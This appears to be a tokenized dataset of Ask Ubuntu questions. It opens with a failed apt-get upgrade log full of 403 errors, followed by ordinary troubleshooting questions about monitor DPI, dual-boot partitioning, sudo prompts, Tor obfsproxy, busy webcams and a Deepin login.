thunderbird-locale-en-gb thunderbird-locale-en-us transmission-common transmission-gtk update-manager update-manager-core update-notifier update-notifier-common wget 95 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . need to get 171 mb of archives . after this operation , 18.3 mb of additional disk space will be used . do you want to continue [ y/n ] ? warning : the following packages can not be authenticated ! r-base-core r-base-dev r-cran-class r-cran-mgcv r-doc-html r-recommended install these packages without verification [ y/n ] ? err http : //dl.google.com/linux/chrome/deb/ stable/main google-chrome-stable amd64 36.0.1985.125-1 403 forbidden err http : //stat.ethz.ch/cran/bin/linux/ubuntu/ precise/ r-base-core 3.1.1-1precise0 403 forbidden err http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/main libdbus-1-3 i386 1.4.18-1ubuntu1.5 403 forbidden err http : //stat.ethz.ch/cran/bin/linux/ubuntu/ precise/ r-base-dev 3.1.1-1precise0 403 forbidden err http : //stat.ethz.ch/cran/bin/linux/ubuntu/ precise/ r-cran-class 7.3-11-1precise0 403 forbidden err http : //stat.ethz.ch/cran/bin/linux/ubuntu/ precise/ r-cran-mgcv 1.8-2-1precise0 403 forbidden err http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/main wget amd64 1.13.4-2ubuntu1.1 403 forbidden err http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/main libjpeg-turbo8-dev amd64 1.1.90+svn733-0ubuntu4.4 403 forbidden err http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/main libjpeg-turbo8 i386 1.1.90+svn733-0ubuntu4.4 403 forbidden err http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/main libjpeg-turbo8 amd64 1.1.90+svn733-0ubuntu4.4 403 forbidden err http : //stat.ethz.ch/cran/bin/linux/ubuntu/ precise/ r-doc-html 3.1.1-1precise0 403 forbidden err http : //stat.ethz.ch/cran/bin/linux/ubuntu/ precise/ r-recommended 3.1.1-1precise0 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libdbus-1-3 i386 1.4.18-1ubuntu1.5 403 forbidden err http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/main lightdm amd64 1.2.3-0ubuntu2.5 403 forbidden err http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/main update-manager all 1:0.156.14.17 403 forbidden err http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/main update-manager-core amd64 1:0.156.14.17 403 forbidden err http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/main update-notifier amd64 0.119ubuntu8.7 403 forbidden err http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/main update-notifier-common all 0.119ubuntu8.7 503 service unavailable err http : //security.ubuntu.com/ubuntu/ precise-security/main libdbus-1-3 amd64 1.4.18-1ubuntu1.5 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libtasn1-3-dev amd64 2.10-1ubuntu1.2 403 forbidden err http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/main compiz-gnome amd64 1:0.9.7.12-0ubuntu4 403 forbidden err http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/main compiz-plugins-default amd64 1:0.9.7.12-0ubuntu4 403 forbidden err http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/main libdecoration0 amd64 1:0.9.7.12-0ubuntu4 403 forbidden err http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/main compiz-core amd64 1:0.9.7.12-0ubuntu4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libtasn1-3 i386 2.10-1ubuntu1.2 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libtasn1-3 amd64 2.10-1ubuntu1.2 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libcups2 amd64 1.5.3-0ubuntu8.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libcups2 i386 1.5.3-0ubuntu8.4 403 forbidden err http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/main compiz all 1:0.9.7.12-0ubuntu4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libcupsmime1 amd64 1.5.3-0ubuntu8.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libcupscgi1 amd64 1.5.3-0ubuntu8.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libcupsimage2 i386 1.5.3-0ubuntu8.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libcupsimage2 amd64 1.5.3-0ubuntu8.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libcupsppdc1 amd64 1.5.3-0ubuntu8.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main cups-common all 1.5.3-0ubuntu8.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main cups-bsd amd64 1.5.3-0ubuntu8.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main cups-client amd64 1.5.3-0ubuntu8.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main cups-ppdc amd64 1.5.3-0ubuntu8.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main cups amd64 1.5.3-0ubuntu8.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libcupsdriver1 amd64 1.5.3-0ubuntu8.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main mysql-common all 5.5.38-0ubuntu0.12.04.1 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libmysqlclient18 i386 5.5.38-0ubuntu0.12.04.1 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main dbus amd64 1.4.18-1ubuntu1.5 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main file amd64 5.09-2ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libmagic1 amd64 5.09-2ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main acpi-support amd64 0.140.2 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main dbus-x11 amd64 1.4.18-1ubuntu1.5 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main firefox amd64 31.0+build1-0ubuntu0.12.04.1 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main firefox-globalmenu amd64 31.0+build1-0ubuntu0.12.04.1 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main firefox-locale-en amd64 31.0+build1-0ubuntu0.12.04.1 403 forbidden err http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/main liblightdm-gobject-1-0 amd64 1.2.3-0ubuntu2.5 503 service unavailable err http : //security.ubuntu.com/ubuntu/ precise-security/main libkdeclarative5 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main kdoctools amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main kdelibs-bin amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libkjsembed4 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libkdesu5 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libkhtml5 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libktexteditor4 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libplasma3 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libkrosscore4 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libkcmutils4 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libkde3support4 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libkmediaplayer4 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libkdewebkit5 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libkparts4 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libknewstuff3-4 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libknotifyconfig4 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libnepomukutils4 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libnepomukquery4a amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libkpty4 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libknewstuff2-4 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libkfile4 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libkio5 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libnepomuk4 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libkntlm4 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libkjsapi4 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libkdnssd4 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libkidletime4 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libkdeui5 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libkdecore5 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main kdelibs5-data all 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main kdelibs5-plugins amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libkemoticons4 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libsolid4 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libthreadweaver4 amd64 4:4.8.5-0ubuntu0.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libminiupnpc8 amd64 1.6-3ubuntu1.1 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main linux-generic-lts-quantal amd64 3.5.0.54.59 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main linux-libc-dev amd64 3.2.0-67.101 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main thunderbird-locale-en amd64 1:31.0+build1-0ubuntu0.12.04.1 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main thunderbird amd64 1:31.0+build1-0ubuntu0.12.04.1 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main thunderbird-gnome-support amd64 1:31.0+build1-0ubuntu0.12.04.1 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main thunderbird-globalmenu amd64 1:31.0+build1-0ubuntu0.12.04.1 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main thunderbird-locale-en-gb all 1:31.0+build1-0ubuntu0.12.04.1 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main thunderbird-locale-en-us all 1:31.0+build1-0ubuntu0.12.04.1 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main transmission-common all 2.51-0ubuntu1.4 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main transmission-gtk amd64 2.51-0ubuntu1.4 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-1-3_1.4.18-1ubuntu1.5_i386.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-1-3_1.4.18-1ubuntu1.5_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/libt/libtasn1-3/libtasn1-3-dev_2.10-1ubuntu1.2_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/libt/libtasn1-3/libtasn1-3_2.10-1ubuntu1.2_i386.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/libt/libtasn1-3/libtasn1-3_2.10-1ubuntu1.2_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/c/cups/libcups2_1.5.3-0ubuntu8.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/c/cups/libcups2_1.5.3-0ubuntu8.4_i386.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/c/cups/libcupsmime1_1.5.3-0ubuntu8.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/c/cups/libcupscgi1_1.5.3-0ubuntu8.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/c/cups/libcupsimage2_1.5.3-0ubuntu8.4_i386.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/c/cups/libcupsimage2_1.5.3-0ubuntu8.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/c/cups/libcupsppdc1_1.5.3-0ubuntu8.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/c/cups/cups-common_1.5.3-0ubuntu8.4_all.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/c/cups/cups-bsd_1.5.3-0ubuntu8.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/c/cups/cups-client_1.5.3-0ubuntu8.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/c/cups/cups-ppdc_1.5.3-0ubuntu8.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/c/cups/cups_1.5.3-0ubuntu8.4_amd64.deb 403 forbidden failed to fetch http : //ch.archive.ubuntu.com/ubuntu/pool/main/w/wget/wget_1.13.4-2ubuntu1.1_amd64.deb 403 forbidden failed to fetch http : //dl.google.com/linux/chrome/deb/pool/main/g/google-chrome-stable/google-chrome-stable_36.0.1985.125-1_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/c/cups/libcupsdriver1_1.5.3-0ubuntu8.4_amd64.deb 403 forbidden failed to fetch http : //ch.archive.ubuntu.com/ubuntu/pool/main/libj/libjpeg-turbo/libjpeg-turbo8-dev_1.1.90+svn733-0ubuntu4.4_amd64.deb 403 forbidden failed to fetch http : //ch.archive.ubuntu.com/ubuntu/pool/main/libj/libjpeg-turbo/libjpeg-turbo8_1.1.90+svn733-0ubuntu4.4_i386.deb 403 forbidden failed to fetch http : //ch.archive.ubuntu.com/ubuntu/pool/main/libj/libjpeg-turbo/libjpeg-turbo8_1.1.90+svn733-0ubuntu4.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-common_5.5.38-0ubuntu0.12.04.1_all.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/libmysqlclient18_5.5.38-0ubuntu0.12.04.1_i386.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus_1.4.18-1ubuntu1.5_amd64.deb 403 forbidden failed to fetch http : //ch.archive.ubuntu.com/ubuntu/pool/main/l/lightdm/lightdm_1.2.3-0ubuntu2.5_amd64.deb 403 forbidden failed to fetch http : //ch.archive.ubuntu.com/ubuntu/pool/main/u/update-manager/update-manager_0.156.14.17_all.deb 403 forbidden failed to fetch http : //ch.archive.ubuntu.com/ubuntu/pool/main/u/update-manager/update-manager-core_0.156.14.17_amd64.deb 403 forbidden failed to fetch http : //ch.archive.ubuntu.com/ubuntu/pool/main/u/update-notifier/update-notifier_0.119ubuntu8.7_amd64.deb 403 forbidden failed to fetch http : //ch.archive.ubuntu.com/ubuntu/pool/main/u/update-notifier/update-notifier-common_0.119ubuntu8.7_all.deb 503 service unavailable failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/f/file/file_5.09-2ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/f/file/libmagic1_5.09-2ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/a/acpi-support/acpi-support_0.140.2_amd64.deb 403 forbidden failed to fetch http : //ch.archive.ubuntu.com/ubuntu/pool/main/c/compiz/compiz-gnome_0.9.7.12-0ubuntu4_amd64.deb 403 forbidden failed to fetch http : //ch.archive.ubuntu.com/ubuntu/pool/main/c/compiz/compiz-plugins-default_0.9.7.12-0ubuntu4_amd64.deb 403 forbidden failed to fetch http : //ch.archive.ubuntu.com/ubuntu/pool/main/c/compiz/libdecoration0_0.9.7.12-0ubuntu4_amd64.deb 403 forbidden failed to fetch http : //ch.archive.ubuntu.com/ubuntu/pool/main/c/compiz/compiz-core_0.9.7.12-0ubuntu4_amd64.deb 403 forbidden failed to fetch http : //ch.archive.ubuntu.com/ubuntu/pool/main/c/compiz/compiz_0.9.7.12-0ubuntu4_all.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus-x11_1.4.18-1ubuntu1.5_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_31.0+build1-0ubuntu0.12.04.1_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-globalmenu_31.0+build1-0ubuntu0.12.04.1_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-locale-en_31.0+build1-0ubuntu0.12.04.1_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libkdeclarative5_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdoctools_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs-bin_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libkjsembed4_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libkdesu5_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libkhtml5_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libktexteditor4_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libplasma3_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libkrosscore4_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libkcmutils4_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libkde3support4_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libkmediaplayer4_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libkdewebkit5_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libkparts4_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libknewstuff3-4_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libknotifyconfig4_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libnepomukutils4_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libnepomukquery4a_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libkpty4_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libknewstuff2-4_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libkfile4_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libkio5_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libnepomuk4_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libkntlm4_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libkjsapi4_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libkdnssd4_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libkidletime4_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libkdeui5_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libkdecore5_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-data_4.8.5-0ubuntu0.4_all.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-plugins_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libkemoticons4_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libsolid4_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libthreadweaver4_4.8.5-0ubuntu0.4_amd64.deb 403 forbidden failed to fetch http : //ch.archive.ubuntu.com/ubuntu/pool/main/l/lightdm/liblightdm-gobject-1-0_1.2.3-0ubuntu2.5_amd64.deb 503 service unavailable failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/m/miniupnpc/libminiupnpc8_1.6-3ubuntu1.1_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/l/linux-meta-lts-quantal/linux-generic-lts-quantal_3.5.0.54.59_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_3.2.0-67.101_amd64.deb 403 forbidden failed to fetch http : //stat.ethz.ch/cran/bin/linux/ubuntu/precise/r-base-core_3.1.1-1precise0_amd64.deb 403 forbidden failed to fetch http : //stat.ethz.ch/cran/bin/linux/ubuntu/precise/r-base-dev_3.1.1-1precise0_all.deb 403 forbidden failed to fetch http : //stat.ethz.ch/cran/bin/linux/ubuntu/precise/r-cran-class_7.3-11-1precise0_amd64.deb 403 forbidden failed to fetch http : //stat.ethz.ch/cran/bin/linux/ubuntu/precise/r-cran-mgcv_1.8-2-1precise0_amd64.deb 403 forbidden failed to fetch http : //stat.ethz.ch/cran/bin/linux/ubuntu/precise/r-doc-html_3.1.1-1precise0_all.deb 403 forbidden failed to fetch http : //stat.ethz.ch/cran/bin/linux/ubuntu/precise/r-recommended_3.1.1-1precise0_all.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-locale-en_31.0+build1-0ubuntu0.12.04.1_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_31.0+build1-0ubuntu0.12.04.1_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-gnome-support_31.0+build1-0ubuntu0.12.04.1_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-globalmenu_31.0+build1-0ubuntu0.12.04.1_amd64.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-locale-en-gb_31.0+build1-0ubuntu0.12.04.1_all.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-locale-en-us_31.0+build1-0ubuntu0.12.04.1_all.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/t/transmission/transmission-common_2.51-0ubuntu1.4_all.deb 403 forbidden failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/t/transmission/transmission-gtk_2.51-0ubuntu1.4_amd64.deb 403 forbidden e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ?
505347	how can i change the dpi of my monitors separately ?	i have two fullhd monitors , one of which is a 15 '' laptop screen . how can i change the dpi of only that particular screen , to read text more comfortably ?
505350	create new dynamic disk in windows 8 for ubuntu	background : i 'm trying to dual boot with ubuntu . so , create a new partition/ree unallocated space in windows 8 for ubuntu . but then since its a dynamic disk , ubuntu does n't detect free unallocated space . when i list the drives in diskpart , it list all my 3 current partitions into 1 major disk0 . there are no other disks . i was thinking if i could create one extra disk and convert it to basic volume and use this for ubuntu . the trouble : i do n't want to lose my window8 installation , c drive softwares , d drive data . how should do it ? ca n't post image with low rep so , the link http : // i.stack.imgur.com/vsj5x.png
505353	why does sudo sometimes asks for a different sudo user ?	i have all my boxes setup to authenticate against openldap . when i logon with the local user ( localmin ) and run a command like ; sudo service smbd restart it sometimes asks for the password of localmin but sometimes at random asks for the password of firstname.lastname ( some useraccount ( also member of sudoers ) from the openldap database ) why is this and how do i prevent it ?
505354	could not launch managed proxy executable	i have problem with tor and obfsproxy for using bridges on ubuntu 14.04 . tor could not start obfsproxy and always return permission denied . grep -v `` ^ # '' /etc/tor/torrc | sed '/^ $ /d' usebridges 1 bridge obfs2 192.36.27.216:55313 fccb4bf2a7b89b070902bdd05923c255fb4b0bdb clienttransportplugin obfs2 , obfs3 exec /usr/bin/obfsproxy -- managed tail -f /var/log/tor/log aug 01 13:06:30.000 [ notice ] tor 0.2.4.23 ( git-05b81fcd2a655c5a ) opening new log file . aug 01 13:06:30.000 [ notice ] parsing geoip ipv4 file /usr/share/tor/geoip . aug 01 13:06:30.000 [ notice ] parsing geoip ipv6 file /usr/share/tor/geoip6 . aug 01 13:06:30.000 [ warn ] openssl version from headers does not match the version we 're running with . if you get weird crashes , that might be why . ( compiled with 1000105f : openssl 1.0.1e 11 feb 2013 ; running with 1000106f : openssl 1.0.1f 6 jan 2014 ) . aug 01 13:06:33.000 [ warn ] could not launch managed proxy executable at '/usr/bin/obfsproxy ' ( 'permission denied ' ) . aug 01 13:06:34.000 [ notice ] bootstrapped 5 % : connecting to directory server . aug 01 13:06:34.000 [ warn ] we were supposed to connect to bridge '192.36.27.216:55313 ' using pluggable transport 'obfs2 ' , but we ca n't find a pluggable transport proxy supporting 'obfs2 ' . this can happen if you have n't provided a clienttransportplugin line , or if your pluggable transport proxy stopped running .
505358	unable to use webcams	i have 3 webcams attached to my laptop for a c++/opencv project and my program crashed . now it keeps giving warnings that `` device or resource busy '' . i suspect this is a os level error . is there any way to forcibly unlock my webcams ? i 'm using 14.04 . so far i have disconnected and reconnected the device and tried to change the permission of /dev/video0 /dev/video1 and /dev/video2 to chmod 777 . i have also tried sudo lsof /dev/video0 which did n't work either : lsof : warning : ca n't stat ( ) fuse.gvfsd-fuse file system /run/user/1000/gvf output information may be incomplete . i have also tried complete reboots of the laptop . the problem exists both in 2 usb connected webcams and 1 internal webcam . software updates have n't helped either and the problem has now been persisting for several days now . anybody who has any good idea on how to fix this ?
505363	deepin unable to login	i tried to install deep in from here . while it was doing the install , the software asked for some options to configure . instead of reading them i just pressed esc . so i think thats a mistake i made . after which i tried to login using deepin de , the login gets stuck up with a blank screen . i do n't understand where it does get stuck . i tried to un-install and re-install the package , but it never did asked me those same options again . will it be possible for me to re-install from scratch this package ? or is there any other way , i could make this de work ?
